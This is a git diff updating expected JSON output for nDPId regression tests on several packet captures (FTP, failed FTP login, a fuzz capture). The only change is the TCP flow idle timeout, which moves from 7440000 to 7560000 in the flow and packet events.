+00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1192,"packets-processed":1192,"total-skipped-flows":0,"total-l4-data-len":1050844,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1552590243371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1192/1192 diff --git a/test/results/ftp_failed.pcap.out b/test/results/ftp_failed.pcap.out index 91974a1a2..02ed9c6b1 100644 --- a/test/results/ftp_failed.pcap.out +++ b/test/results/ftp_failed.pcap.out @@ -1,11 +1,11 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp_failed.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1574361625864} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574361625864,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1574361625864,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="} -00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574361625864,"flow_last_seen":1574361625864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1574361625864,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="} +00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-data-len":136,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574361633102} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 18/18 diff --git a/test/results/fuzz-2006-06-26-2594.pcap.out b/test/results/fuzz-2006-06-26-2594.pcap.out index e6b99af24..570b152b0 100644 --- a/test/results/fuzz-2006-06-26-2594.pcap.out +++ b/test/results/fuzz-2006-06-26-2594.pcap.out @@ -66,15 +66,15 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1120469595096,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120469595096,"pkt":"3\/\/\/\/\/\/\/AODtAW69CABFAADlaaMAAIARTBPAqAECwKgB+wCKAIoA0VtoEQ6E7MCoAQIAigC7AACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaVAAIAGJpHAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaaZAADgGJpDAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaadAAIAGJo\/AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaVAAIAGJpHAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaaZAADgGJpDAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaadAAIAGJo\/AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1120469632829,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469632829,"pkt":"ADBUADRWAODtAW69CABFAAA9aaoAAIARTbLAcgECwKgBAQqfADUAKUpe7dQBAAABgAAAUgAAA2Z0cAdlY2l0ZexlA2NvbQAAAQAB"} 